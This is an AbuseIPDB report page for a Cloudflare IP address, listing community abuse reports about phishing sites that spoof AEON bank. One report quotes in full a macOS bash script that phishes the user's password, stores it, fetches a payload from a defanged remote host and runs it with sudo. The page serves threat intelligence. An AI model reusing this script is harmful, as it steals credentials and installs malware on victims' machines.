JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 104.21.52.144

104.21.52.144 was found in our database!

This IP was reported 5 times. Confidence of Abuse is 0%: ?

ISP	Cloudflare, Inc.
Usage Type	Content Delivery Network
ASN	AS13335
Domain Name	cloudflare.com
Country	🇺🇸 United States of America
City	San Francisco, California

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Important Note: 104.21.52.144 is an IP address from within our whitelist belonging to the subnet 104.16.0.0/13, which we identify as: "Cloudflare Reverse Proxy".

Whitelisted netblocks are typically owned by trusted entities, such as Google or Microsoft who may use them for search engine spiders. However, these same entities sometimes also provide cloud servers and mail services which are easily abused. Pay special attention when trusting or distrusting these IPs.

Report 104.21.52.144

Whois 104.21.52.144

IP Abuse Reports for 104.21.52.144:

This IP address has been reported a total of 5 times from 5 distinct sources. 104.21.52.144 was first reported on August 10th 2024, and the most recent report was 4 months ago.

Old Reports: The most recent abuse report for this IP address is from 4 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 NN AA	2026-02-18 16:22:21 (4 months ago)	Phishing SCAM URL(s) detected: https://www.cubeaptitude.com/c/537HjxAGAaUBXjmgKavMw5KsLGlg9L9C4OFH-Z ... show more Phishing SCAM URL(s) detected: https://www.cubeaptitude.com/c/537HjxAGAaUBXjmgKavMw5KsLGlg9L9C4OFH-Z9udbMNuPBgcQpZpG2PVsyBCKnf8mn2Snn5HldaKF6ZFE8EXkiGmBlxQfNy-Z8dajI2D_4=/eKZm5g%3D%3D https://www.cubeaptitude.com/i/689004086-vW8PmJixza9oK9Ja1bir0yl9zRBhE4trDCHDy5zxygKWrWxR https://www.cubeaptitude.com/i/940736141-nTB5gk9CDhpXl8etkcpPNJO5lpW6HGbeOEynZUBv0KU9JU85 https://www.cubeaptitude.com/u/d/537HjxAGAaUBXjmgKavMw5KsLGlg9L9C4OFH-Z9udbMNuPBgcQpZpG2PVsyBCKnf8mn2Snn5HldaKF6ZFE8EXkiGmBlxQfNy-Z8dajI2D_4=/4jfO5w%3D%3D https://www.cubeaptitude.com/o/537HjxAGAaUBXjmgKavMw5KsLGlg9L9C4OFH-Z9udbMNuPBgcQpZpG2PVsyBCKnf8mn2Snn5HldaKF6ZFE8EXkiGmBlxQfNy-Z8dajI2D_4= show less	Fraud Orders Phishing Email Spam Hacking Spoofing Bad Web Bot Exploited Host
🇫🇷 JE55II	2025-12-08 15:00:00 (6 months ago)	Date et heure : Dec. 8, 2025 Command : ``` `/bin/bash -c #!/bin/bash username=$(whoami) while tru ... show more Date et heure : Dec. 8, 2025 Command : ``` `/bin/bash -c #!/bin/bash username=$(whoami) while true; do echo -n "System Password: " read password echo if dscl . -authonly "$username" "$password" >/dev/null 2>&1; then echo -n "$password" > /tmp/.pass break else echo "Incorrect password! Try again." fi done curl -o /tmp/update hxxps[://]shrimpfc[.]com/ibkr/update >/dev/null 2>&1 echo "$password" \| sudo -S xattr -c /tmp/update >/dev/null 2>&1 chmod +x /tmp/update /tmp/update` ``` Script used to: - identify actively connected users - open a loop requesting the user's password in a loop - record attempted passwords in the [/tmp/update] file - terminate the script by uploading the file containing the passwords to [hxxps[://]shrimpfc[.]com/ibkr/update] This script was launched following the use of [runningboardd], an “RMM” type application used to manage application resources on MacOS. (links cleaned) show less	Phishing Hacking
🇯🇵 pota	2024-08-11 04:18:00 (1 year ago)	* Phishing website Spoofing AEON Financial Service Co., Ltd. genuine site: https://www.aeonfina ... show more * Phishing website Spoofing AEON Financial Service Co., Ltd. genuine site: https://www.aeonfinancial.co.jp/ https://www.aeon.co.jp/ https://www.aeonbank.co.jp/ category: Bank / Credit Card e-mail receive date: Sun, 11 Aug 2024 04:36:05 +0900 URL: https://aeon.raise001.com IP: 2606:4700:3031::ac43:c84e / 2606:4700:3037::6815:3490 / 172.67.200.78 / 104.21.52.144 country: USA hosting: Cloudflare, Inc (Phishing Site GIGA Factory) contact form: https://www.cloudflare.com/abuse e-mail: [email protected], [email protected], [email protected] show less	Phishing Email Spam Spoofing
🇯🇵 Nanoniele	2024-08-10 23:42:00 (1 year ago)	[Phishing e-mail] Subject of e-mail: 株式会社イオン銀行ご利用確認のお願い Linked website: aeon.raise001.com Spoofin ... show more [Phishing e-mail] Subject of e-mail: 株式会社イオン銀行ご利用確認のお願い Linked website: aeon.raise001.com Spoofing: AEON bank show less	Phishing Email Spam Spoofing
🇯🇵 fred	2024-08-10 23:02:18 (1 year ago)	as aeon.raise001.com for card issuing bank SAISON fake login in Japanese	Phishing

Showing 1 to 5 of 5 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇳🇱 91.92.42.34

🇺🇸 40.119.33.98

🇨🇭 209.99.190.113

🇦🇷 186.39.148.64

🇨🇳 118.228.150.100

🇨🇳 111.41.238.144

🇺🇸 108.61.87.135

🇸🇮 102.220.160.41

🇩🇪 69.5.169.218

🇮🇳 61.247.230.105

🇳🇱 45.153.34.15

🇨🇳 8.140.225.151

🇨🇳 223.91.73.244

🇲🇽 187.192.50.135

🇳🇱 172.70.47.163

🇳🇱 172.70.47.83

🇮🇳 159.89.174.87

🇩🇪 138.197.191.87

🇨🇳 118.81.201.233

🇨🇦 85.217.149.41